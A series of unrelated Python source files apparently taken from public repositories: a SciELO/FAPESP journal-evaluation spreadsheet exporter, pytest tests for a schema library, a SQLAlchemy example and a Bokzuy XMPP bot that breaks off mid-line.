col += 1
else:
# "Outro" para periódicos sem este dado
worksheet.write(row, col, "Outro")
col += 1
# 0 para periodicos sem este dado
worksheet.write(row, col, 0)
col += 1
worksheet.write(row, col, 0)
col += 1
worksheet.write(row, col, 0)
col += 1
# marcar 1 para coluna outro - periodico sem este dado
worksheet.write(row, col, 1)
col += 1
# Adocao de ORCID
col = 21
if 'orcid' in doc:
worksheet.write(row, col, 1)
col += 1
worksheet.write(row, col, 0)
col += 1
else:
worksheet.write(row, col, 0)
col += 1
worksheet.write(row, col, 0)
col += 1
# SciELO Avaliacao - tipo de instituicao
col = 23
if 'avaliacao' in doc:
if 'tipo_inst' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['tipo_inst'])
col += 1
if 'tipo_1' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['tipo_1'])
else:
if doc['avaliacao']['tipo_inst'] == 1:
worksheet.write(row, col, 1)
col += 1
if 'tipo_2' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['tipo_2'])
else:
if doc['avaliacao']['tipo_inst'] == 2:
worksheet.write(row, col, 1)
col += 1
if 'tipo_3' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['tipo_3'])
else:
if doc['avaliacao']['tipo_inst'] == 3:
worksheet.write(row, col, 1)
col += 1
if 'tipo_4' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['tipo_4'])
else:
if doc['avaliacao']['tipo_inst'] == 4:
worksheet.write(row, col, 1)
col += 1
if 'inst_n1' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['inst_n1'])
col += 1
if 'inst_n2' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['inst_n2'])
col += 1
if 'inst_n3' in doc['avaliacao']:
worksheet.write(row, col, doc['avaliacao']['inst_n3'])
col += 1
if 'contatos' in doc['avaliacao']:
count = 0
for c in doc['avaliacao']['contatos']:
name = None
lattes = None
orcid = None
if c['cargo'] == 'Editor-chefe' or c['cargo'] == 'Editor':
count += 1
name = c['first_name'] + ' ' + c['last_name']
lattes = c['cv_lattes_editor_chefe']
orcid = c['orcid_editor_chefe']
if name:
worksheet.write(row, col, name)
col += 1
if lattes:
worksheet.write(row, col, lattes)
col += 1
if orcid:
worksheet.write(row, col, orcid)
col += 1
if count == 3:
break
else:
col += 17
# Thematic Areas
col = 40
for k in [
'title_thematic_areas',
'title_is_agricultural_sciences',
'title_is_applied_social_sciences',
'title_is_biological_sciences',
'title_is_engineering',
'title_is_exact_and_earth_sciences',
'title_is_health_sciences',
'title_is_human_sciences',
'title_is_linguistics_letters_and_arts',
'title_is_multidisciplinary'
]:
if k in doc:
worksheet.write(row, col, doc[k])
col += 1
# Wos Categories
col = 50
if 'wos_subject_areas' in doc['api']:
worksheet.write(row, col, '; '.join(
doc['api']['wos_subject_areas']))
col += 1
# Historico
worksheet.write(row, col, doc.title_current_status)
col += 1
if 'first_year' in doc['api']:
worksheet.write(row, col, int(doc['api']['first_year']))
col += 1
worksheet.write(row, col, doc.inclusion_year_at_scielo)
col += 1
if 'stopping_year_at_scielo' in doc:
worksheet.write(row, col, doc.stopping_year_at_scielo)
col += 1
worksheet.write(
row, col, doc.date_of_the_first_document, format_date_iso)
col += 1
worksheet.write(
row, col, doc.date_of_the_last_document, format_date_iso)
col += 1
# APC
col = 57
if 'apc' in doc:
if doc['apc']['apc'] == 'Sim':
worksheet.write(row, col, 1)
else:
worksheet.write(row, col, 0)
col += 1
# if doc['apc']['value']:
# worksheet.write(row, col, doc['apc']['value'])
# col += 1
if doc['apc']['comments']:
worksheet.write(row, col, doc['apc']['comments'])
col += 1
apc_list = []
for f in range(1, 9):
coin = None
value = None
concept = None
if 'apc' + str(f) + '_value_coin':
coin = doc['apc']['apc' + str(f) + '_value_coin']
value = doc['apc']['apc' + str(f) + '_value']
concept = doc['apc']['apc' + str(f) + '_concept']
if coin or value or concept:
apc_list.append('[%s) value: %s %s - concept: %s]' %
(str(f), coin, value, concept))
if apc_list:
worksheet.write(row, col, '; '.join(apc_list))
col += 1
else:
worksheet.write(row, col, 0)
col += 4
# Indexacao
col = 60
worksheet.write(row, col, doc.is_scopus)
col += 1
worksheet.write(row, col, doc.is_jcr)
col += 1
# WOS
worksheet.write(row, col, doc.is_wos)
col += 1
# SCIE
scie = 0
if 'wos_indexes' in doc:
for i in doc['wos_indexes']:
if 'scie' in i['index']:
scie = 1
break
worksheet.write(row, col, scie)
col += 1
# SSCI
ssci = 0
if 'wos_indexes' in doc:
for i in doc['wos_indexes']:
if 'ssci' in i['index']:
ssci = 1
break
worksheet.write(row, col, ssci)
col += 1
# A&HCI
ahci = 0
if 'wos_indexes' in doc:
for i in doc['wos_indexes']:
if 'ahci' in i['index']:
ahci = 1
break
worksheet.write(row, col, ahci)
col += 1
# ESCI
esci = 0
if 'wos_indexes' in doc:
for i in doc['wos_indexes']:
if 'esci' in i['index']:
esci = 1
break
worksheet.write(row, col, esci)
col += 1
# Pubmed, PMC
col = 67
pubmed = models.Pubmedapi.objects.filter(issn_list=doc.issn_scielo)
if pubmed:
if 'pubmed' in pubmed[0]['db_name']:
worksheet.write(row, col, 1 or 0)
col += 1
if 'pmc' in pubmed[0]['db_name']:
worksheet.write(row, col, 1 or 0)
col += 1
else:
worksheet.write(row, col, 0)
col += 1
worksheet.write(row, col, 0)
col += 1
# ANO DE PUBLICACAO
col = 69
if h == 'anterior':
year = '2007'
else:
year = h
worksheet.write(row, col, int(year))
col += 1
# Documentos
if 'docs' in doc:
if 'docs_' + h in doc['docs']:
worksheet.write(row, col, doc['docs']['docs_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'document_en_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'document_en_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'document_pt_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'document_pt_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'document_es_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'document_es_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'doc_2_more_lang_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'doc_2_more_lang_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'document_other_languages_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'document_other_languages_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
# CITABLES
if 'is_citable_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'is_citable_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'tipo_review_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'tipo_review_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'citable_en_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'citable_en_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'citable_pt_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'citable_pt_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'citable_es_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'citable_es_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'citable_doc_2_more_lang_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'citable_doc_2_more_lang_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
if 'citable_other_lang_' + h in doc['docs']:
worksheet.write(row, col, doc['docs'][
'citable_other_lang_' + h] or 0)
else:
worksheet.write(row, col, 0)
col += 1
else:
col += 13
# Acessos
col = 83
if 'access' in doc:
if h == 'anterior':
pass
elif h == '2011':
hy = 'anterior'
for yacc in [
'anterior',
'2012',
'2013',
'2014',
'2015',
'2016',
'2017',
'2018'
]:
if 'pub_' + hy + '_acc_anterior' in doc['access']:
worksheet.write(row, col, doc['access'][
'pub_' + hy + '_acc_' + yacc])
else:
worksheet.write(row, col, 0)
col += 1
elif int(h) > 2011:
for yacc in [
'anterior',
'2012',
'2013',
'2014',
'2015',
'2016',
'2017',
'2018'
]:
if 'pub_' + h + '_acc_' + yacc in doc['access']:
worksheet.write(row, col, doc['access'][
'pub_' + h + '_acc_' + yacc] or 0)
else:
worksheet.write(row, col, 0)
col += 1
else:
col += 8
# SciELO CI WOS cited
col = 91
if 'scieloci' in doc:
if h == 'anterior':
pass
else:
year = str(h)
if 'docs_' + year in doc['scieloci']:
worksheet.write(
row, col, doc['scieloci']['docs_' + year])
col += 1
if 'is_citable_' + year in doc['scieloci']:
worksheet.write(row, col, doc['scieloci'][
'is_citable_' + year])
col += 1
if 'scieloci_cited_' + year in doc['scieloci']:
worksheet.write(row, col, doc['scieloci'][
'scieloci_cited_' + year])
col += 1
if 'scieloci_wos_cited_' + year in doc['scieloci']:
worksheet.write(row, col, doc['scieloci'][
'scieloci_wos_cited_' + year])
col += 1
if 'one_o_more_scielo_cited_' + year in doc['scieloci']:
worksheet.write(row, col, doc['scieloci'][
'one_o_more_scielo_cited_' + year])
col += 1
if 'one_o_more_wos_cited_' + year in doc['scieloci']:
worksheet.write(row, col, doc['scieloci'][
'one_o_more_wos_cited_' + year])
col += 1
else:
col += 6
# Google
col = 97
if h == 'anterior':
pass
else:
year = str(h)
if 'google_scholar_h5_' + year in doc:
worksheet.write(row, col, doc['google_scholar_h5_' + year])
col += 1
if 'google_scholar_m5_' + year in doc:
worksheet.write(row, col, doc['google_scholar_m5_' + year])
col += 1
# SCOPUS - CiteScore
col = 99
if doc['is_scopus'] == 1:
if h in scopus and 'citescore' in scopus[h]:
worksheet.write(row, col, formatindicator(
scopus[h]['citescore']))
col += 1
# Scopus - SNIP - APLICAR PARA 2007 (SEM ACUMULAR MESMO)
col = 100
h2 = None
if h == 'anterior':
h2 = '2007'
else:
h2 = h
snip = 0
if doc['is_scopus'] == 1:
if h2 in scopus and 'snip' in scopus[h2]:
worksheet.write(
row, col, formatindicator(scopus[h2]['snip']))
snip = 1
else:
snip = 0
if snip == 0:
if doc['is_cwts'] == 1:
cwts = models.Cwts.objects.filter(id=str(doc.cwts_id))[0]
if h2 in cwts and 'snip' in cwts[h2]:
worksheet.write(
row, col, formatindicator(cwts[h2]['snip']))
snip = 1
col += 1
# SCIMAGO - SJR, tt_docs, tt_cites, cites_by_docs, h_index
col = 101
h2 = None
if h == 'anterior':
h2 = '2007'
else:
h2 = h
if doc['is_scimago'] == 1:
scimago = models.Scimago.objects.filter(
id=str(doc.scimago_id))[0]
for i in [
'sjr',
'total_docs_3years',
'total_cites_3years',
'cites_by_doc_2years',
'h_index'
]:
if h2 in scimago and i in scimago[h2]:
worksheet.write(
row, col, formatindicator(scimago[h2][i]))
col += 1
# JCR
col = 106
if doc['is_jcr'] == 1:
if h == 'anterior':
h2 = '2007'
else:
h2 = h
jcr = models.Jcr.objects.filter(id=str(doc.jcr_id))[0]
for i in [
'total_cites',
'journal_impact_factor',
'impact_factor_without_journal_self_cites',
'five_year_impact_factor',
'immediacy_index',
'citable_items',
'cited_half_life',
'citing_half_life',
'eigenfactor_score',
'article_influence_score',
'percentage_articles_in_citable_items',
'average_journal_impact_factor_percentile',
'normalized_eigenfactor'
]:
if h2 in jcr and i in jcr[h2]:
worksheet.write(row, col, formatjcr(jcr[h2][i]))
col += 1
else:
col += 13
# Affiliations_documents
col = 119
if 'aff' in doc:
if h == 'anterior':
if 'br_ate_2007' in doc['aff']:
worksheet.write(row, col, doc['aff'][
'br_ate_2007'] or 0)
col += 1
if 'estrang_ate_2007' in doc['aff']:
worksheet.write(row, col, doc['aff'][
'estrang_ate_2007'] or 0)
col += 1
if 'nao_ident_ate_2007' in doc['aff']:
worksheet.write(row, col, doc['aff'][
'nao_ident_ate_2007'] or 0)
col += 1
if 'br_estrang_ate_2007' in doc['aff']:
worksheet.write(row, col, doc['aff'][
'br_estrang_ate_2007'] or 0)
col += 1
if 'nao_ident_todos_ate_2007' in doc['aff']:
worksheet.write(row, col, doc['aff'][
'nao_ident_todos_ate_2007'] or 0)
col += 1
if 'br_' + h in doc['aff']:
worksheet.write(row, col, doc['aff']['br_' + h] or 0)
col += 1
if 'estrang_' + h in doc['aff']:
worksheet.write(row, col, doc['aff']['estrang_' + h] or 0)
col += 1
if 'nao_ident_' + h in doc['aff']:
worksheet.write(row, col, doc['aff'][
'nao_ident_' + h] or 0)
col += 1
if 'br_estrang_' + h in doc['aff']:
worksheet.write(row, col, doc['aff'][
'br_estrang_' + h] or 0)
col += 1
if 'nao_ident_todos_' + h in doc['aff']:
worksheet.write(row, col, doc['aff'][
'nao_ident_todos_' + h] or 0)
col += 1
else:
col += 5
# Manuscritos
col = 124
if 'manuscritos' in doc:
if h == '2014':
col += 4
if 'recebidos_2014' in doc['manuscritos']:
worksheet.write(row, col, formatman(
doc['manuscritos']['recebidos_2014']))
col += 1
if 'aprovados_2014' in doc['manuscritos']:
worksheet.write(row, col, formatman(
doc['manuscritos']['aprovados_2014']))
col += 1
else:
if 'recebidos_' + h + '_1sem' in doc['manuscritos']:
worksheet.write(row, col, formatman(
doc['manuscritos']['recebidos_' + h + '_1sem']))
col += 1
if 'aprovados_' + h + '_1sem' in doc['manuscritos']:
worksheet.write(row, col, formatman(
doc['manuscritos']['aprovados_' + h + '_1sem']))
col += 1
if 'recebidos_' + h + '_2sem' in doc['manuscritos']:
worksheet.write(row, col, formatman(
doc['manuscritos']['recebidos_' + h + '_2sem']))
col += 1
if 'aprovados_' + h + '_2sem' in doc['manuscritos']:
worksheet.write(row, col, formatman(
doc['manuscritos']['aprovados_' + h + '_2sem']))
col += 1
# Tempos entre submissao, aprovacao e publicacao
col = 130
if 'times' in doc:
if h == 'anterior':
# sub_aprov
if 'media_meses_sub_aprov_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['media_meses_sub_aprov_ate_2007'])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_sub_aprov_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_sub_aprov_ate_2007'])
worksheet.write(row, col, times)
col += 1
# sub_pub
if 'media_meses_sub_pub_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['media_meses_sub_pub_ate_2007'])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_sub_pub_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_sub_pub_ate_2007'])
worksheet.write(row, col, times)
col += 1
# sub_pub_scielo
if 'media_meses_sub_pub_scielo_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['media_meses_sub_pub_scielo_ate_2007'])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_sub_pub_scielo_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_sub_pub_scielo_ate_2007'])
worksheet.write(row, col, times)
col += 1
# aprov_pub
if 'media_meses_aprov_pub_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['media_meses_aprov_pub_ate_2007'])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_aprov_pub_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_aprov_pub_ate_2007'])
worksheet.write(row, col, times)
col += 1
# aprov_pub_scielo
if 'media_meses_aprov_pub_scielo_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['media_meses_aprov_pub_scielo_ate_2007'])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_aprov_pub_scielo_ate_2007' in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_aprov_pub_scielo_ate_2007'])
worksheet.write(row, col, times)
col += 1
else:
# sub_aprov
if 'media_meses_sub_aprov_' + h in doc['times']:
times = timesfmt(
doc['times']['media_meses_sub_aprov_' + h])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_sub_aprov_' + h in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_sub_aprov_' + h])
worksheet.write(row, col, times)
col += 1
# sub_pub
if 'media_meses_sub_pub_' + h in doc['times']:
times = timesfmt(
doc['times']['media_meses_sub_pub_' + h])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_sub_pub_' + h in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_sub_pub_' + h])
worksheet.write(row, col, times)
col += 1
# sub_pub_scielo
if 'media_meses_sub_pub_scielo_' + h in doc['times']:
times = timesfmt(
doc['times']['media_meses_sub_pub_scielo_' + h])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_sub_pub_scielo_' + h in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_sub_pub_scielo_' + h])
worksheet.write(row, col, times)
col += 1
# aprov_pub
if 'media_meses_aprov_pub_' + h in doc['times']:
times = timesfmt(
doc['times']['media_meses_aprov_pub_' + h])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_aprov_pub_' + h in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_aprov_pub_' + h])
worksheet.write(row, col, times)
col += 1
# aprov_pub_scielo
if 'media_meses_aprov_pub_scielo_' + h in doc['times']:
times = timesfmt(
doc['times']['media_meses_aprov_pub_scielo_' + h])
worksheet.write(row, col, times)
col += 1
if 'desvp_meses_aprov_pub_scielo_' + h in doc['times']:
times = timesfmt(
doc['times']['desvp_meses_aprov_pub_scielo_' + h])
worksheet.write(row, col, times)
col += 1
# SciELO - Citações Concedidass
col = 140
if 'citations' in doc:
for cit in doc['citations']:
if h in cit:
# print(cit[h])
for label in [
'total_citgrant',
'total_citgrant_journals',
'total_citgrant_autocit',
'citgrant_journal_scielo',
'citgrant_journal_scielo_wos',
'citgrant_journal_wos',
'citgrant_journal_other',
'citgrant_other_docs',
'citgrant_books',
'cit_pub_year',
'cit_pubyear_minus1',
'cit_pubyear_minus2',
'cit_pubyear_minus3',
'cit_pubyear_minus4',
'cit_pubyear_minus5',
'cit_pubyear_minus6',
'cit_pubyear_minus7',
'cit_pubyear_minus8',
'cit_pubyear_minus9',
'cit_pubyear_minus10'
]:
citation = cit[h][label]
worksheet.write(row, col, citation or '')
col += 1
else:
col += 20
# Access - Google Analytics
col = 160
if 'ga_access' in doc:
if h == '2017':
for label in [
'total_access',
'porcent_americas',
'porcent_brazil',
'porcent_united_states',
'porcent_asia',
'porcent_china',
'porcent_india',
'porcent_europe',
'porcent_spain',
'porcent_portugal',
'porcent_africa',
'porcent_south_africa',
'porcent_palop',
'porcent_oceania',
'porcent_others'
]:
if label in doc['ga_access']:
ga_access = doc['ga_access'][label]
worksheet.write(row, col, ga_access)
col += 1
else:
col += 15
# Avança ano
row += 1
# Avança journal
row += 1
# Creates 'areas tematicas' worksheet
formatline = workbook.add_format({'text_wrap': False, 'size': 9})
worksheet3 = workbook.add_worksheet('dados agregados - AT')
worksheet3.freeze_panes(1, 0)
worksheet3.set_row(0, 60)
sheet3 = pyexcel.get_sheet(
file_name=atfile,
sheet_name='import',
name_columns_by_row=0)
sheet3_json = sheet3.to_records()
row = 0
col = 0
for h in sheet3.colnames:
worksheet3.write(row, col, h, wrap_header)
col += 1
row = 1
for line in sheet3_json:
col = 0
for label in sheet3.colnames:
if col == 0:
worksheet3.write(row, col, line[label], format_date_iso)
else:
worksheet3.write(row, col, line[label], formatline)
col += 1
row += 1
# Creates 'descricao rotulos' worksheet
worksheet2 = workbook.add_worksheet('rótulos-dados-periódicos')
worksheet2.set_column(0, 0, 30)
worksheet2.set_column(1, 1, 70)
sheet2 = pyexcel.get_sheet(
file_name='data/scielo/rotulos_avaliacao_fapesp_abel.xlsx',
sheet_name='rotulos_dados_periodicos',
name_columns_by_row=0)
sheet2_json = sheet2.to_records()
worksheet2.write(0, 0, 'Rótulo', formatline)
worksheet2.write(0, 1, 'Descrição', formatline)
row = 1
for line in sheet2_json:
col = 0
worksheet2.write(row, col, line['rotulo_portugues'], formatline)
col += 1
worksheet2.write(row, col, line['descricao'], formatline)
row += 1
# Grava planilha Excel
workbook.close()
def alljournals():
scielo = models.Scielofapesp.objects.filter(
fapesp_evaluation__2018__fullset=1)
today = datetime.datetime.now().strftime('%Y%m%d')
filename = 'Fapesp-avaliação-SciELO-todos-' + today + '.xlsx'
sheetname = 'SciELO-todos'
atfile = 'data/scielo/Fapesp-avaliação-SciELO-todos-AT.xlsx'
journal(
query=scielo,
filename=filename,
sheetname=sheetname,
issn=None,
atfile=atfile)
def activethisyear():
scielo = models.Scielofapesp.objects.filter(
fapesp_evaluation__2018__activethisyear=1)
today = datetime.datetime.now().strftime('%Y%m%d')
filename = 'Fapesp-avaliação-SciELO-ativos2018-' + today + '.xlsx'
sheetname = 'SciELO-ativos2018'
atfile = 'data/scielo/Fapesp-avaliação-SciELO-ativos2018-AT.xlsx'
journal(
query=scielo,
filename=filename,
sheetname=sheetname,
issn=None,
atfile=atfile)
# Ativos neste ano e inclusos antes de 2016
def activethisyear_inclusion_before():
# já considera:
# title_current_status='current'
# collection='scl'
scielo = models.Scielofapesp.objects.filter(
fapesp_evaluation__2018__evaluated=1)
today = datetime.datetime.now().strftime('%Y%m%d')
filename = 'Fapesp-avaliação-SciELO-ativos2018-até2015-' + today + '.xlsx'
sheetname = 'SciELO-ativos2018-ate2015'
atfile = 'data/scielo/Fapesp-avaliação-SciELO-ativos2018-até2015-AT.xlsx'
journal(
query=scielo,
filename=filename,
sheetname=sheetname,
issn=None,
atfile=atfile)
def onejournal():
scielo = models.Scielofapesp.objects.filter(
fapesp_evaluation__2018__evaluated=1)
counter = 0
for j in scielo:
counter += 1
issn = j['issn_scielo']
queryj = models.Scielofapesp.objects.filter(issn_list=issn)
short_title = accent_remover(j['short_title_scielo'])
title = re.sub(r'[\[\]:*?/\\]', "", short_title)
# acronym = j['api']['acronym']
print(title.lower())
today = datetime.datetime.now().strftime('%Y%m%d')
filename = 'Fapesp-avaliacao-SciELO-' + issn + '-' + today + '.xlsx'
atfile = 'data/scielo/Fapesp-avaliação-SciELO-ativos2018-até2015-AT-import.xlsx'
journal(
query=queryj,
filename=filename,
sheetname=title[0:30],
issn=issn,
atfile=atfile)
print(counter)
# teste MIOC
# queryj = models.Scielofapesp.objects.filter(issn_list='0074-0276')
# issn = '0074-0276'
# filename = 'avaliacao_scielo_'+issn+'.xlsx'
# sheetname = 'Mem. Inst. Oswaldo Cruz'
# atfile = 'data/scielo/Fapesp-avaliação-SciELO-ativos2018-até2015-AT.xlsx'
# journal(query=queryj, filename=filename, sheetname=sheetname, issn=issn, atfile=atfile)
def main():
# Todos os periodicos da colecao scielo (fullset)
# alljournals()
# Ativos em 2018 (activethisyear)
# activethisyear()
# Antes de 2016 (evaluated)
# activethisyear_inclusion_before()
# Antes de 2016 (evaluated) - 1 planilha por periódico
onejournal()
if __name__ == "__main__":
main()
| bsd-2-clause | -1,299,251,792,692,191,500 | 35.709705 | 93 | 0.407071 | false |
xethorn/sukimu | tests/test_schema.py | 1 | 4130 | from unittest import mock
import pytest
from oto import response
from oto import status
from sukimu import fields
from sukimu import operations
from sukimu import schema
def create_schema(fields=None, indexes=None):
table = schema.Table('TableName')
indexes = indexes or set()
fields = fields or dict()
return schema.Schema(table, *indexes, **fields)
def test_create_schema(monkeypatch):
table = schema.Table('TableName')
s = schema.Schema(table)
assert isinstance(s, schema.Schema)
assert s.table is table
assert table.schema == s
def test_create_schema_with_fields():
table = schema.Table('TableName')
s = schema.Schema(table, id=fields.Field())
assert isinstance(s.fields_dependencies.get('id'), list)
assert len(s.indexes) == 0
def test_create_schema_with_indexes(monkeypatch):
table = schema.Table('TableName')
index = schema.Index('id')
monkeypatch.setattr(table, 'add_index', mock.MagicMock())
s = schema.Schema(table, index)
assert len(s.indexes) == 1
assert table.add_index.called
def test_field_validation_on_create():
s = create_schema(fields=dict(
id=fields.Field(),
username=fields.Field(required=True)))
# operation is mandatory
with pytest.raises(Exception):
s.validate({})
resp = s.validate({'id': 'test'}, operations.CREATE)
assert resp.status is status.BAD_REQUEST
assert resp.errors.get('message').get('username')
assert not resp.errors.get('message').get('id')
resp = s.validate({'username': 'test'}, operations.CREATE)
assert resp.status is status.OK
resp = s.validate({}, operations.READ)
assert resp.status is status.OK
def test_field_validation_on_read():
s = create_schema(fields=dict(
id=fields.Field(),
username=fields.Field(required=True)))
resp = s.validate(
{'username': 'foo', 'unknownfield': 'value'}, operations.READ)
assert resp.status is status.OK
assert not resp.message.get('unknownfield')
# Fields to validate should be a dictionary of format:
# <field name, value>
with pytest.raises(Exception):
s.validate([], operations.READ)
@pytest.fixture
def full_schema():
return create_schema(
indexes=[
schema.Index('id'),
schema.Index('id', 'username')],
fields=dict(
id=fields.Field(),
username=fields.Field(required=True)))
def test_ensure_index(monkeypatch, full_schema):
# If the validation_response is not the rigt object, throws an exception.
with pytest.raises(Exception):
full_schema.ensure_indexes(object())
error_response = response.Response(status=status.BAD_REQUEST)
assert full_schema.ensure_indexes(error_response) is error_response
data = dict(id='id-value', username='username-value')
fetch_one = mock.MagicMock(return_value=error_response)
success_response = response.Response(data)
monkeypatch.setattr(full_schema, 'fetch_one', fetch_one)
resp = full_schema.ensure_indexes(success_response)
assert resp
fetch_one.return_value = success_response
resp = full_schema.ensure_indexes(success_response)
assert not resp
assert 'id' in resp.errors.get('message')
assert 'username' in resp.errors.get('message')
def test_extensions(full_schema):
@full_schema.extension('stats')
def stats(item, fields):
return
assert full_schema.extensions.get('stats')
def test_decorating_with_extension(full_schema):
"""Test decorating with an extension.
"""
spy = mock.MagicMock()
item = {'id': 'foo'}
context = {'value': 'context_value'}
fields = {'extension_name': ['foo']}
extension_name = 'extension_name'
@full_schema.extension(extension_name)
def stats(item, fields, context=None):
spy(item, fields, context)
return context.get('value')
response = full_schema.decorate(item, fields=fields, context=context)
spy.assert_called_with(item, ['foo'], context)
assert spy.called
assert response.get(extension_name) == context.get('value')
| mit | 6,177,569,530,216,235,000 | 28.29078 | 77 | 0.672639 | false |
spaus/pysandbox | sqltests.py | 1 | 2443 | import os
import sys
from sqlalchemy import Column, ForeignKey, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
Base = declarative_base()
class Person(Base):
__tablename__ = 'person'
# Here we define columns for the table person
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
name = Column(String(250), nullable=False)
class Address(Base):
__tablename__ = 'address'
# Here we define columns for the table address.
# Notice that each column is also a normal Python instance attribute.
id = Column(Integer, primary_key=True)
street_name = Column(String(250))
street_number = Column(String(250))
post_code = Column(String(250), nullable=False)
person_id = Column(Integer, ForeignKey('person.id'))
person = relationship(Person)
def createExampleDB(BaseClass):
# Create an engine that stores data in the local directory's
# sqlalchemy_example.db file.
engine = create_engine('sqlite:///sqlalchemy_example.db')
# Create all tables in the engine. This is equivalent to "Create Table"
# statements in raw SQL.
BaseClass.metadata.create_all(engine)
def addRecords(BaseClass):
engine = create_engine('sqlite:///sqlalchemy_example.db')
# Bind the engine to the metadata of the Base class so that the
# declaratives can be accessed through a DBSession instance
BaseClass.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
# A DBSession() instance establishes all conversations with the database
# and represents a "staging zone" for all the objects loaded into the
# database session object. Any change made against the objects in the
# session won't be persisted into the database until you call
# session.commit(). If you're not happy about the changes, you can
# revert all of them back to the last commit by calling
# session.rollback()
session = DBSession()
# Insert a Person in the person table
new_person = Person(name='new person')
session.add(new_person)
session.commit()
# Insert an Address in the address table
new_address = Address(post_code='00000', person=new_person)
session.add(new_address)
session.commit()
# createExampleDB(Base)
addRecords(Base) | mit | -8,484,875,581,494,622,000 | 34.42029 | 76 | 0.722882 | false |
diacritica/bokzuyXMPPbot | bokzuy_bot.py | 1 | 5842 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
bokzuyXMPPbot: Your dummy XMPP bot for Bokzuy.com
Copyright (C) 2012 Pablo Ruiz Múzquiz
See the file LICENSE for copying permission.
"""
import sys
import logging
import getpass
import json
import sleekxmpp
import requests
from optparse import OptionParser
# Make sure we use UTF-8 by default even with python < 3.0.
if sys.version_info < (3, 0):
reload(sys)
sys.setdefaultencoding('utf8')
else:
raw_input = input
class EchoBot(sleekxmpp.ClientXMPP):
"""
A simple SleekXMPP bot for Bokzuy that will follow orders
such as listing friends, badges and sending bokies.
Based on the SleekXMPP bot.
"""
def __init__(self, jid, password, bokzuy_auth):
sleekxmpp.ClientXMPP.__init__(self, jid, password)
self.add_event_handler("session_start", self.start)
self.add_event_handler("message", self.message)
self.bokzuy_auth = bokzuy_auth
def start(self, event):
self.send_presence()
self.get_roster()
def message(self, msg):
"""
Process incoming message stanzas. Be aware that this also
includes MUC messages and error messages. It is usually
a good idea to check the messages's type before processing
or sending replies.
Arguments:
msg -- The received message stanza. See the documentation
for stanza objects and the Message stanza to see
how it may be used.
"""
if msg['type'] in ('chat', 'normal'):
msgstr = "%(body)s" % msg
if msgstr == "b":
result = self.get_badges()
resultdict = json.loads(result)
resultlist = ["%i - %s" % (badge["id"], badge["name"]) for \
badge in resultdict["badges"]]
resultlist.sort()
resultstr = "\n".join(resultlist)
elif msgstr == "f":
result = self.get_friends()
resultdict = json.loads(result)
resultlist = ["%i - %s" % (friend[u"id"], friend[u"name"]) for\
friend in resultdict[u"friends"]]
resultlist.sort()
resultstr = "\n".join(resultlist)
else:
try:
if msgstr.count("@") == 3:
badgeid, userid, comment, group = msgstr.split("@")
else:
group = ""
badgeid, userid, comment = msgstr.split("@")
result = self.send_boky(int(badgeid), int(userid), \
comment, group)
resultstr = json.loads(result)["msg"]
except:
resultstr = "This bot is away or you made a mistake"
msg.reply(resultstr).send()
def send_boky(self, badgeid=1, userid=10, \
comment="API TEST THROUGH XMPP BOT :)", group="kaleidos"):
params = {
'badgeId': badgeid,
'comment': comment,
'group': group,
}
response = requests.post("https://api.bokzuy.com/%s/bokies" % \
